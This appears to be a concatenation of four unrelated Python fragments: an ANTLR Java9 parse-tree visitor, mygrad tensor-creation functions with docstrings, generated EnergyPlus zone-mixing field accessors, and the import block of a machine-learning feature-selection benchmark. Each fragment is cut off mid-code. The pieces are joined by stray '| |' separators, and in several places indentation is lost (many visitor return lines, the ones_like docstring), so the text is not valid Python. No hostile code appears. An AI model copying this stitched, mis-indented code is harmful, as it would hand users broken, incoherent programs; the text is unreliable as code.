    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#statementExpression.
def visitStatementExpression(self, ctx:Java9Parser.StatementExpressionContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#ifThenStatement.
def visitIfThenStatement(self, ctx:Java9Parser.IfThenStatementContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#ifThenElseStatement.
def visitIfThenElseStatement(self, ctx:Java9Parser.IfThenElseStatementContext):
    return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#ifThenElseStatementNoShortIf.
def visitIfThenElseStatementNoShortIf(self, ctx:Java9Parser.IfThenElseStatementNoShortIfContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#assertStatement.
def visitAssertStatement(self, ctx:Java9Parser.AssertStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#switchStatement.
def visitSwitchStatement(self, ctx:Java9Parser.SwitchStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#switchBlock.
def visitSwitchBlock(self, ctx:Java9Parser.SwitchBlockContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#switchBlockStatementGroup.
def visitSwitchBlockStatementGroup(self, ctx:Java9Parser.SwitchBlockStatementGroupContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#switchLabels.
def visitSwitchLabels(self, ctx:Java9Parser.SwitchLabelsContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#switchLabel.
def visitSwitchLabel(self, ctx:Java9Parser.SwitchLabelContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#enumConstantName.
def visitEnumConstantName(self, ctx:Java9Parser.EnumConstantNameContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#whileStatement.
def visitWhileStatement(self, ctx:Java9Parser.WhileStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#whileStatementNoShortIf.
def visitWhileStatementNoShortIf(self, ctx:Java9Parser.WhileStatementNoShortIfContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#doStatement.
def visitDoStatement(self, ctx:Java9Parser.DoStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#forStatement.
def visitForStatement(self, ctx:Java9Parser.ForStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#forStatementNoShortIf.
def visitForStatementNoShortIf(self, ctx:Java9Parser.ForStatementNoShortIfContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#basicForStatement.
def visitBasicForStatement(self, ctx:Java9Parser.BasicForStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#basicForStatementNoShortIf.
def visitBasicForStatementNoShortIf(self, ctx:Java9Parser.BasicForStatementNoShortIfContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#forInit.
def visitForInit(self, ctx:Java9Parser.ForInitContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#forUpdate.
def visitForUpdate(self, ctx:Java9Parser.ForUpdateContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#statementExpressionList.
def visitStatementExpressionList(self, ctx:Java9Parser.StatementExpressionListContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#enhancedForStatement.
def visitEnhancedForStatement(self, ctx:Java9Parser.EnhancedForStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#enhancedForStatementNoShortIf.
def visitEnhancedForStatementNoShortIf(self, ctx:Java9Parser.EnhancedForStatementNoShortIfContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#breakStatement.
def visitBreakStatement(self, ctx:Java9Parser.BreakStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#continueStatement.
def visitContinueStatement(self, ctx:Java9Parser.ContinueStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#returnStatement.
def visitReturnStatement(self, ctx:Java9Parser.ReturnStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#throwStatement.
def visitThrowStatement(self, ctx:Java9Parser.ThrowStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#synchronizedStatement.
def visitSynchronizedStatement(self, ctx:Java9Parser.SynchronizedStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#tryStatement.
def visitTryStatement(self, ctx:Java9Parser.TryStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#catches.
def visitCatches(self, ctx:Java9Parser.CatchesContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#catchClause.
def visitCatchClause(self, ctx:Java9Parser.CatchClauseContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#catchFormalParameter.
def visitCatchFormalParameter(self, ctx:Java9Parser.CatchFormalParameterContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#catchType.
def visitCatchType(self, ctx:Java9Parser.CatchTypeContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#finally_.
def visitFinally_(self, ctx:Java9Parser.Finally_Context):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#tryWithResourcesStatement.
def visitTryWithResourcesStatement(self, ctx:Java9Parser.TryWithResourcesStatementContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#resourceSpecification.
def visitResourceSpecification(self, ctx:Java9Parser.ResourceSpecificationContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#resourceList.
def visitResourceList(self, ctx:Java9Parser.ResourceListContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#resource.
def visitResource(self, ctx:Java9Parser.ResourceContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#variableAccess.
def visitVariableAccess(self, ctx:Java9Parser.VariableAccessContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#primary.
def visitPrimary(self, ctx:Java9Parser.PrimaryContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#primaryNoNewArray.
def visitPrimaryNoNewArray(self, ctx:Java9Parser.PrimaryNoNewArrayContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#primaryNoNewArray_lf_arrayAccess.
def visitPrimaryNoNewArray_lf_arrayAccess(self, ctx:Java9Parser.PrimaryNoNewArray_lf_arrayAccessContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#primaryNoNewArray_lfno_arrayAccess.
def visitPrimaryNoNewArray_lfno_arrayAccess(self, ctx:Java9Parser.PrimaryNoNewArray_lfno_arrayAccessContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#primaryNoNewArray_lf_primary.
def visitPrimaryNoNewArray_lf_primary(self, ctx:Java9Parser.PrimaryNoNewArray_lf_primaryContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#primaryNoNewArray_lf_primary_lf_arrayAccess_lf_primary.
def visitPrimaryNoNewArray_lf_primary_lf_arrayAccess_lf_primary(self, ctx:Java9Parser.PrimaryNoNewArray_lf_primary_lf_arrayAccess_lf_primaryContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#primaryNoNewArray_lf_primary_lfno_arrayAccess_lf_primary.
def visitPrimaryNoNewArray_lf_primary_lfno_arrayAccess_lf_primary(self, ctx:Java9Parser.PrimaryNoNewArray_lf_primary_lfno_arrayAccess_lf_primaryContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#primaryNoNewArray_lfno_primary.
def visitPrimaryNoNewArray_lfno_primary(self, ctx:Java9Parser.PrimaryNoNewArray_lfno_primaryContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#primaryNoNewArray_lfno_primary_lf_arrayAccess_lfno_primary.
def visitPrimaryNoNewArray_lfno_primary_lf_arrayAccess_lfno_primary(self, ctx:Java9Parser.PrimaryNoNewArray_lfno_primary_lf_arrayAccess_lfno_primaryContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#primaryNoNewArray_lfno_primary_lfno_arrayAccess_lfno_primary.
def visitPrimaryNoNewArray_lfno_primary_lfno_arrayAccess_lfno_primary(self, ctx:Java9Parser.PrimaryNoNewArray_lfno_primary_lfno_arrayAccess_lfno_primaryContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#classLiteral.
def visitClassLiteral(self, ctx:Java9Parser.ClassLiteralContext):
return self.visitChildren(ctx)
# Visit a parse tree produced by Java9Parser#classInstanceCreationExpression.
def visitClassInstanceCreationExpression(self, | |
from typing import Optional, Sequence, Union
import numpy as np
from mygrad.tensor_base import Tensor, _resolve_constant, implements_numpy_override
from mygrad.typing import ArrayLike, DTypeLikeReals, Real
# Accepted shape specification: either a single dimension or a sequence of dimensions.
Shape = Union[Sequence[int], int]
def _anything_but_tensor(x):
    """Unwrap a ``Tensor`` to its underlying numpy array; pass anything else through."""
    return x.data if isinstance(x, Tensor) else x
# Names exported via ``from <this module> import *`` — the module's public
# tensor-creation API (numpy-mirroring routines).
__all__ = [
    "arange",
    "empty",
    "empty_like",
    "eye",
    "geomspace",
    "identity",
    "linspace",
    "logspace",
    "ones",
    "ones_like",
    "full",
    "full_like",
    "zeros",
    "zeros_like",
]
def empty(
    shape: Shape, dtype: DTypeLikeReals = np.float32, *, constant: Optional[bool] = None
) -> Tensor:
    """Create a Tensor of the given shape and dtype without initializing its entries.

    Mirrors ``numpy.empty`` [1]_.

    Parameters
    ----------
    shape : Union[int, Tuple[int]]
        Shape of the resulting tensor.

    dtype : data-type, optional (default=numpy.float32)
        Data type of the resulting tensor.

    constant : Optional[bool]
        If ``True``, the tensor is a constant and does not back-propagate.
        Defaults to ``False`` for float-type data and ``True`` for
        integer-type data; integer-type tensors must be constant.

    Returns
    -------
    Tensor
        A tensor of uninitialized data of the given shape and dtype.

    See Also
    --------
    empty_like : Return an empty tensor with shape and type of input.
    ones : Return a new tensor setting values to one.
    zeros : Return a new tensor setting values to zero.
    full : Return a new tensor of given shape filled with value.

    Notes
    -----
    Unlike ``zeros``, ``empty`` does not zero the memory, which can be
    marginally faster — but the caller must fill every entry before use.

    References
    ----------
    .. [1] Retrieved from https://numpy.org/doc/stable/reference/generated/numpy.empty.html

    Examples
    --------
    >>> import mygrad as mg
    >>> mg.empty([2, 2], constant=True)  # doctest: +SKIP
    Tensor([[ -9.74499359e+001,   6.69583040e-309],
            [  2.13182611e-314,   3.06959433e-309]]) #random
    """
    uninitialized = np.empty(shape=shape, dtype=dtype)
    # The freshly-allocated array is owned solely by the new Tensor, so no
    # defensive copy is needed.
    return Tensor(uninitialized, constant=constant, copy=False)
@implements_numpy_override()
def empty_like(
    other: ArrayLike,
    dtype: Optional[DTypeLikeReals] = None,
    shape: Optional[Union[int, Sequence[int]]] = None,
    *,
    constant: Optional[bool] = None,
) -> Tensor:
    """Create an uninitialized Tensor whose shape and dtype mirror ``other``.

    Mirrors ``numpy.empty_like`` [1]_.

    Parameters
    ----------
    other : ArrayLike
        The tensor or array whose shape and datatype are mirrored.

    dtype : Optional[DTypeLikeReals]
        If given, overrides the data type of the result.

    shape : Optional[Union[int, Sequence[int]]]
        If given, overrides the shape of the result.

    constant : Optional[bool]
        If ``True``, the tensor is a constant and does not back-propagate.
        If ``None``: inferred from ``other`` when it is a tensor, otherwise
        ``False`` for float-type data and ``True`` for integer-type data.

    Returns
    -------
    Tensor
        A tensor of uninitialized data whose shape and type match ``other``.

    See Also
    --------
    empty : Return a new Tensor of the given shape and type, without initializing entries.
    ones : Return a new tensor setting values to one.
    zeros : Return a new tensor setting values to zero.
    full : Return a new tensor of given shape filled with value.

    References
    ----------
    .. [1] Retrieved from https://numpy.org/doc/stable/reference/generated/numpy.empty_like.html

    Examples
    --------
    >>> import mygrad as mg
    >>> x = mg.arange(4).reshape(2, 2)
    >>> mg.empty_like(x, dtype=int)  # doctest: +SKIP
    Tensor([[-1073741821, -1067949133],
            [  496041986,    19249760]]) #random
    """
    # Inherit constancy from ``other`` when the caller did not specify one.
    constant = _resolve_constant(other, constant=constant)
    # numpy must see raw array data, never a Tensor instance.
    template = _anything_but_tensor(other)
    return Tensor(
        np.empty_like(template, dtype=dtype, shape=shape),
        constant=constant,
        copy=False,
    )
def eye(
    N: int,
    M: Optional[int] = None,
    k: int = 0,
    dtype: DTypeLikeReals = float,
    *,
    constant: Optional[bool] = None,
) -> Tensor:
    """Return a 2D Tensor with ones on the diagonal and zeros elsewhere.

    This docstring was adapted from ``numpy.eye`` [1]_

    Parameters
    ----------
    N : int
        The number of rows in the output Tensor.

    M : int, optional (default=None)
        The number of columns in the output, or None to match ``N``.

    k : int, optional (default=0)
        The index of the diagonal. 0 is the main diagonal; a positive value is the upper
        diagonal, while a negative value refers to the lower diagonal.

    dtype : data-type, optional (default=float)
        The data type of the output Tensor.

    constant : Optional[bool]
        If ``True``, this tensor is a constant, and thus does not facilitate
        back propagation.

        Defaults to ``False`` for float-type data.
        Defaults to ``True`` for integer-type data.

        Integer-type tensors must be constant.

    References
    ----------
    .. [1] Retrieved from https://numpy.org/doc/stable/reference/generated/numpy.eye.html

    Returns
    -------
    Tensor
        A tensor whose elements are 0, except for the :math:`k`-th diagonal, whose values are 1.

    Examples
    --------
    >>> import mygrad as mg
    >>> mg.eye(2, dtype=int)
    Tensor([[1, 0],
            [0, 1]])
    >>> mg.eye(3, k=1)
    Tensor([[ 0.,  1.,  0.],
            [ 0.,  0.,  1.],
            [ 0.,  0.,  0.]])
    """
    # np.eye allocates a fresh array, so the Tensor can take ownership of it
    # without a defensive copy.
    return Tensor(
        np.eye(N, M=M, k=k, dtype=dtype),
        constant=constant,
        copy=False,
    )
def identity(
    n: int, dtype: DTypeLikeReals = float, *, constant: Optional[bool] = None
) -> Tensor:
    """Return the identity Tensor; a square Tensor with 1s on the main diagonal and 0s elsewhere.

    This docstring was adapted from ``numpy.identity`` [1]_

    Parameters
    ----------
    n : int
        The number of rows and columns in the output Tensor.

    dtype : data-type, optional (default=float)
        The data type of the output Tensor.

    constant : Optional[bool]
        If ``True``, this tensor is a constant, and thus does not facilitate
        back propagation.

        Defaults to ``False`` for float-type data.
        Defaults to ``True`` for integer-type data.

        Integer-type tensors must be constant.

    Returns
    -------
    Tensor
        A square Tensor whose main diagonal is 1 and all other elements are 0.

    References
    ----------
    .. [1] Retrieved from https://numpy.org/doc/stable/reference/generated/numpy.identity.html

    Examples
    --------
    >>> import mygrad as mg
    >>> mg.identity(3)
    Tensor([[ 1.,  0.,  0.],
            [ 0.,  1.,  0.],
            [ 0.,  0.,  1.]])
    """
    # np.identity returns a new array; the Tensor takes ownership without copying.
    return Tensor(np.identity(n, dtype=dtype), constant=constant, copy=False)
def ones(
    shape: Shape, dtype: DTypeLikeReals = np.float32, *, constant: Optional[bool] = None
) -> Tensor:
    """Create a Tensor of the given shape and dtype with every entry set to one.

    Mirrors ``numpy.ones`` [1]_.

    Parameters
    ----------
    shape : Union[int, Tuple[int]]
        Shape of the resulting tensor.

    dtype : data-type, optional (default=numpy.float32)
        Data type of the resulting tensor.

    constant : Optional[bool]
        If ``True``, the tensor is a constant and does not back-propagate.
        Defaults to ``False`` for float-type data and ``True`` for
        integer-type data; integer-type tensors must be constant.

    Returns
    -------
    Tensor
        A Tensor of ones with the given shape and data type.

    See Also
    --------
    ones_like : Return a tensor of ones with shape and type of input.
    empty : Return a new uninitialized tensor.
    zeros : Return a new tensor setting values to zero.
    full : Return a new tensor of given shape filled with value.

    References
    ----------
    .. [1] Retrieved from https://numpy.org/doc/stable/reference/generated/numpy.ones.html

    Examples
    --------
    >>> import mygrad as mg
    >>> mg.ones(5)
    Tensor([ 1.,  1.,  1.,  1.,  1.])
    >>> mg.ones((5,), dtype=int)
    Tensor([1, 1, 1, 1, 1])
    >>> mg.ones((2, 2))
    Tensor([[ 1.,  1.],
            [ 1.,  1.]])
    """
    filled = np.ones(shape, dtype=dtype)
    # The freshly-allocated array belongs exclusively to the new Tensor, so
    # it is safe to hand over without copying.
    return Tensor(filled, constant=constant, copy=False)
@implements_numpy_override()
def ones_like(
other: ArrayLike,
dtype: Optional[DTypeLikeReals] = None,
shape: Optional[Union[int, Sequence[int]]] = None,
*,
constant: Optional[bool] = None,
) -> Tensor:
"""
Return a Tensor of the same shape and type as the given, filled with ones.
This docstring was adapted from ``numpy.ones_like`` [1]_
Parameters
----------
other : array_like
The Tensor or array whose shape and datatype should be mirrored.
dtype : Optional[DTypeLikeReals]
Override the data type of the returned Tensor with this value, or None to not override.
shape : Optional[Union[int, Sequence[int]]]
If specified, overrides the shape of the result
constant : Optional[bool]
If ``True``, this tensor is a constant, and thus does not facilitate
back propagation. If ``None`` then:
Inferred from ``other``, if other is a tensor
Defaults to ``False`` for float-type data.
Defaults to ``True`` for integer-type data.
Returns
-------
Tensor
A Tensor of ones whose shape and data type match `other`.
References
----------
.. [1] Retrieved from https://numpy.org/doc/stable/reference/generated/numpy.ones_like.html
Examples
--------
>>> import mygrad as mg
>>> x = mg.arange(6).reshape((2, 3))
>>> x
Tensor([[0, 1, 2],
[3, 4, 5]])
>>> mg.ones_like(x)
Tensor([[1, 1, 1],
[1, 1, 1]])
>>> y = mg.arange(3, dtype=float)
>>> y
Tensor([ 0., 1., 2.])
>>> mg.ones_like(y)
| |
`value` is not a valid value
Returns:
float: the value of `flow_rate_per_zone_floor_area` or None if not set
"""
return self["Flow Rate per Zone Floor Area"]
# NOTE(review): machine-generated accessor boilerplate (pyidf style). Each
# property maps one IDD field name onto the underlying DataObject mapping via
# ``self[...]``; validation happens in the mapping, which raises ValueError
# for invalid values. Prefer regenerating from the IDD over hand-editing.
@flow_rate_per_zone_floor_area.setter
def flow_rate_per_zone_floor_area(self, value=None):
    """Corresponds to IDD field `Flow Rate per Zone Floor Area`"""
    self["Flow Rate per Zone Floor Area"] = value

@property
def flow_rate_per_person(self):
    """field `Flow Rate per Person`

    | Units: m3/s-person

    Args:
        value (float): value for IDD Field `Flow Rate per Person`

    Raises:
        ValueError: if `value` is not a valid value

    Returns:
        float: the value of `flow_rate_per_person` or None if not set
    """
    return self["Flow Rate per Person"]

@flow_rate_per_person.setter
def flow_rate_per_person(self, value=None):
    """Corresponds to IDD field `Flow Rate per Person`"""
    self["Flow Rate per Person"] = value

@property
def air_changes_per_hour(self):
    """field `Air Changes per Hour`

    | Units: 1/hr

    Args:
        value (float): value for IDD Field `Air Changes per Hour`

    Raises:
        ValueError: if `value` is not a valid value

    Returns:
        float: the value of `air_changes_per_hour` or None if not set
    """
    return self["Air Changes per Hour"]

@air_changes_per_hour.setter
def air_changes_per_hour(self, value=None):
    """Corresponds to IDD field `Air Changes per Hour`"""
    self["Air Changes per Hour"] = value

@property
def source_zone_name(self):
    """field `Source Zone Name`

    Args:
        value (str): value for IDD Field `Source Zone Name`

    Raises:
        ValueError: if `value` is not a valid value

    Returns:
        str: the value of `source_zone_name` or None if not set
    """
    return self["Source Zone Name"]

@source_zone_name.setter
def source_zone_name(self, value=None):
    """Corresponds to IDD field `Source Zone Name`"""
    self["Source Zone Name"] = value

@property
def delta_temperature(self):
    """field `Delta Temperature`

    | This field contains the constant temperature differential between source and
    | receiving zones below which cross mixing is shutoff. This value must be greater
    | than or equal to zero.
    | Units: deltaC

    Args:
        value (float): value for IDD Field `Delta Temperature`

    Raises:
        ValueError: if `value` is not a valid value

    Returns:
        float: the value of `delta_temperature` or None if not set
    """
    return self["Delta Temperature"]

@delta_temperature.setter
def delta_temperature(self, value=None):
    """Corresponds to IDD field `Delta Temperature`"""
    self["Delta Temperature"] = value

@property
def delta_temperature_schedule_name(self):
    """field `Delta Temperature Schedule Name`

    | This schedule contains the temperature differential between source and receiving
    | zones versus time below which cross mixing is shutoff.

    Args:
        value (str): value for IDD Field `Delta Temperature Schedule Name`

    Raises:
        ValueError: if `value` is not a valid value

    Returns:
        str: the value of `delta_temperature_schedule_name` or None if not set
    """
    return self["Delta Temperature Schedule Name"]

@delta_temperature_schedule_name.setter
def delta_temperature_schedule_name(self, value=None):
    """Corresponds to IDD field `Delta Temperature Schedule Name`"""
    self["Delta Temperature Schedule Name"] = value

@property
def minimum_zone_temperature_schedule_name(self):
    """field `Minimum Zone Temperature Schedule Name`

    | This schedule contains the indoor temperature versus time below which
    | cross mixing is shutoff.

    Args:
        value (str): value for IDD Field `Minimum Zone Temperature Schedule Name`

    Raises:
        ValueError: if `value` is not a valid value

    Returns:
        str: the value of `minimum_zone_temperature_schedule_name` or None if not set
    """
    return self["Minimum Zone Temperature Schedule Name"]

@minimum_zone_temperature_schedule_name.setter
def minimum_zone_temperature_schedule_name(self, value=None):
    """Corresponds to IDD field `Minimum Zone Temperature Schedule Name`"""
    self["Minimum Zone Temperature Schedule Name"] = value

@property
def maximum_zone_temperature_schedule_name(self):
    """field `Maximum Zone Temperature Schedule Name`

    | This schedule contains the indoor temperature versus time above which
    | cross mixing is shutoff.

    Args:
        value (str): value for IDD Field `Maximum Zone Temperature Schedule Name`

    Raises:
        ValueError: if `value` is not a valid value

    Returns:
        str: the value of `maximum_zone_temperature_schedule_name` or None if not set
    """
    return self["Maximum Zone Temperature Schedule Name"]

@maximum_zone_temperature_schedule_name.setter
def maximum_zone_temperature_schedule_name(self, value=None):
    """Corresponds to IDD field `Maximum Zone Temperature Schedule Name`"""
    self["Maximum Zone Temperature Schedule Name"] = value

@property
def minimum_source_zone_temperature_schedule_name(self):
    """field `Minimum Source Zone Temperature Schedule Name`

    | This schedule contains the source zone dry-bulb temperature versus time below
    | which cross mixing is shutoff.

    Args:
        value (str): value for IDD Field `Minimum Source Zone Temperature Schedule Name`

    Raises:
        ValueError: if `value` is not a valid value

    Returns:
        str: the value of `minimum_source_zone_temperature_schedule_name` or None if not set
    """
    return self["Minimum Source Zone Temperature Schedule Name"]

@minimum_source_zone_temperature_schedule_name.setter
def minimum_source_zone_temperature_schedule_name(self, value=None):
    """Corresponds to IDD field `Minimum Source Zone Temperature Schedule Name`"""
    self["Minimum Source Zone Temperature Schedule Name"] = value

@property
def maximum_source_zone_temperature_schedule_name(self):
    """field `Maximum Source Zone Temperature Schedule Name`

    | This schedule contains the source zone dry-bulb temperature versus time above
    | which cross mixing is shutoff.

    Args:
        value (str): value for IDD Field `Maximum Source Zone Temperature Schedule Name`

    Raises:
        ValueError: if `value` is not a valid value

    Returns:
        str: the value of `maximum_source_zone_temperature_schedule_name` or None if not set
    """
    return self["Maximum Source Zone Temperature Schedule Name"]

@maximum_source_zone_temperature_schedule_name.setter
def maximum_source_zone_temperature_schedule_name(self, value=None):
    """Corresponds to IDD field `Maximum Source Zone Temperature Schedule Name`"""
    self["Maximum Source Zone Temperature Schedule Name"] = value

@property
def minimum_outdoor_temperature_schedule_name(self):
    """field `Minimum Outdoor Temperature Schedule Name`

    | This schedule contains the outdoor temperature versus time below which
    | cross mixing is shutoff.

    Args:
        value (str): value for IDD Field `Minimum Outdoor Temperature Schedule Name`

    Raises:
        ValueError: if `value` is not a valid value

    Returns:
        str: the value of `minimum_outdoor_temperature_schedule_name` or None if not set
    """
    return self["Minimum Outdoor Temperature Schedule Name"]

@minimum_outdoor_temperature_schedule_name.setter
def minimum_outdoor_temperature_schedule_name(self, value=None):
    """Corresponds to IDD field `Minimum Outdoor Temperature Schedule Name`"""
    self["Minimum Outdoor Temperature Schedule Name"] = value

@property
def maximum_outdoor_temperature_schedule_name(self):
    """field `Maximum Outdoor Temperature Schedule Name`

    | This schedule contains the outdoor temperature versus time above which
    | cross mixing is shutoff.

    Args:
        value (str): value for IDD Field `Maximum Outdoor Temperature Schedule Name`

    Raises:
        ValueError: if `value` is not a valid value

    Returns:
        str: the value of `maximum_outdoor_temperature_schedule_name` or None if not set
    """
    return self["Maximum Outdoor Temperature Schedule Name"]

@maximum_outdoor_temperature_schedule_name.setter
def maximum_outdoor_temperature_schedule_name(self, value=None):
    """Corresponds to IDD field `Maximum Outdoor Temperature Schedule Name`"""
    self["Maximum Outdoor Temperature Schedule Name"] = value
class ZoneRefrigerationDoorMixing(DataObject):
"""Corresponds to IDD object `ZoneRefrigerationDoorMixing` Refrigeration
Door Mixing is used for an opening between two zones that are at the same
elevation but have different air temperatures.
In this case, the mixing air flow
between the two zones is determined by the density difference between the two zones.
This would typically be used between two zones in a refrigerated warehouse that are
controlled at different temperatures. It could also be used to model a door to a walk-in
refrigerated space if that space were modeled as a zone instead of using the object Refrigeration:WalkIn.
"""
# Field schema generated from the EnergyPlus IDD: describes each field's
# name, python alias, requiredness, numeric bounds/defaults and units.
# The DataObject base class reads this to validate ``self[...]`` access.
_schema = {'extensible-fields': OrderedDict(),
           'fields': OrderedDict([(u'name',
                                   {'name': u'Name',
                                    'pyname': u'name',
                                    'required-field': True,
                                    'autosizable': False,
                                    'autocalculatable': False,
                                    'type': u'alpha'}),
                                  (u'zone 1 name',
                                   {'name': u'Zone 1 Name',
                                    'pyname': u'zone_1_name',
                                    'required-field': True,
                                    'autosizable': False,
                                    'autocalculatable': False,
                                    'type': u'object-list'}),
                                  (u'zone 2 name',
                                   {'name': u'Zone 2 Name',
                                    'pyname': u'zone_2_name',
                                    'required-field': True,
                                    'autosizable': False,
                                    'autocalculatable': False,
                                    'type': u'object-list'}),
                                  (u'schedule name',
                                   {'name': u'Schedule Name',
                                    'pyname': u'schedule_name',
                                    'required-field': True,
                                    'autosizable': False,
                                    'autocalculatable': False,
                                    'type': u'object-list'}),
                                  (u'door height',
                                   {'name': u'Door Height',
                                    'pyname': u'door_height',
                                    'default': 3.0,
                                    'maximum': 50.0,
                                    'required-field': False,
                                    'autosizable': False,
                                    'minimum': 0.0,
                                    'autocalculatable': False,
                                    'type': u'real',
                                    'unit': u'm'}),
                                  (u'door area',
                                   {'name': u'Door Area',
                                    'pyname': u'door_area',
                                    'default': 9.0,
                                    'maximum': 400.0,
                                    'required-field': False,
                                    'autosizable': False,
                                    'minimum': 0.0,
                                    'autocalculatable': False,
                                    'type': u'real',
                                    'unit': u'm2'}),
                                  (u'door protection type',
                                   {'name': u'Door Protection Type',
                                    'pyname': u'door_protection_type',
                                    'default': u'None',
                                    'required-field': False,
                                    'autosizable': False,
                                    'accepted-values': [u'None',
                                                        u'AirCurtain',
                                                        u'StripCurtain'],
                                    'autocalculatable': False,
                                    'type': 'alpha'})]),
           'format': None,
           'group': u'Zone Airflow',
           'min-fields': 4,
           'name': u'ZoneRefrigerationDoorMixing',
           'pyname': u'ZoneRefrigerationDoorMixing',
           'required-object': False,
           'unique-object': False}

@property
def name(self):
    """field `Name`

    Args:
        value (str): value for IDD Field `Name`

    Raises:
        ValueError: if `value` is not a valid value

    Returns:
        str: the value of `name` or None if not set
    """
    return self["Name"]

@name.setter
def name(self, value=None):
    """Corresponds to IDD field `Name`"""
    self["Name"] = value

@property
def zone_1_name(self):
    """field `Zone 1 Name`

    Args:
        value (str): value for IDD Field `Zone 1 Name`

    Raises:
        ValueError: if `value` is not a valid value

    Returns:
        str: the value of `zone_1_name` or None if not set
    """
    return self["Zone 1 Name"]

@zone_1_name.setter
def zone_1_name(self, value=None):
    """Corresponds to IDD field `Zone 1 Name`"""
    self["Zone 1 Name"] = value
@property
| |
# <gh_stars>1-10  (dataset artifact; commented out — not valid Python)
#!/usr/bin/python3
from functools import partial
from datetime import datetime
import pandas as pd
from joblib import parallel_backend
import random
import numpy as np
from sklearn.calibration import CalibratedClassifierCV
import shutil
import pathlib
import os
import math
import random
from matplotlib import pyplot
import matplotlib.pyplot as plt
import time
import copy
import random
import pickle
from joblib import Parallel, delayed
import tempfile
from xgboost import XGBClassifier
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis, QuadraticDiscriminantAnalysis
from sklearn.naive_bayes import GaussianNB, BernoulliNB, CategoricalNB, ComplementNB
from sklearn.ensemble import ExtraTreesClassifier
from sklearn.neural_network import MLPClassifier
from joblib import Parallel, delayed
import itertools
import multiprocessing
import socket
from glob import glob
from collections import OrderedDict
import logging
import mlflow
from typing import Dict, Any
import hashlib
import json
from pymrmre import mrmr
from pprint import pprint
from sklearn.utils._testing import ignore_warnings
from sklearn.exceptions import ConvergenceWarning
from sklearn.feature_selection import RFE, RFECV
from sklearn.dummy import DummyClassifier
from sklearn.metrics import confusion_matrix
from sklearn.metrics import roc_curve, auc, roc_auc_score, precision_recall_curve
from sklearn.metrics import accuracy_score, f1_score, precision_score, recall_score, classification_report
from sklearn.linear_model import LogisticRegression, SGDClassifier
from sklearn.svm import SVC, LinearSVC
from sklearn.ensemble import AdaBoostClassifier
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import GridSearchCV
from sklearn.model_selection import cross_val_score
from sklearn.preprocessing import StandardScaler
from sklearn.covariance import EllipticEnvelope
from sklearn.neighbors import KNeighborsClassifier
from sklearn.ensemble import IsolationForest, RandomForestClassifier
from sklearn.model_selection import RepeatedStratifiedKFold
from sklearn.pipeline import Pipeline
from sklearn.feature_selection import SelectKBest, SelectFromModel
from sklearn.feature_selection import mutual_info_classif
from mlflow import log_metric, log_param, log_artifact, log_dict, log_image
from loadData import *
from utils import *
from parameters import *
from extraFeatureSelections import *
### parameters
# Root directory of the MLflow tracking store used by this benchmark run.
TrackingPath = "/data/results/radFS/mlrun.benchmark"
# fselParameters / clfParameters presumably come from the star-import of
# `parameters` above -- TODO confirm against that module.
print ("Have", len(fselParameters["FeatureSelection"]["Methods"]), "Feature Selection Methods.")
print ("Have", len(clfParameters["Classification"]["Methods"]), "Classifiers.")
# like cross-validation: every parameter combination is visited exactly once
def getExperiments (experimentList, expParameters, sKey, inject = None):
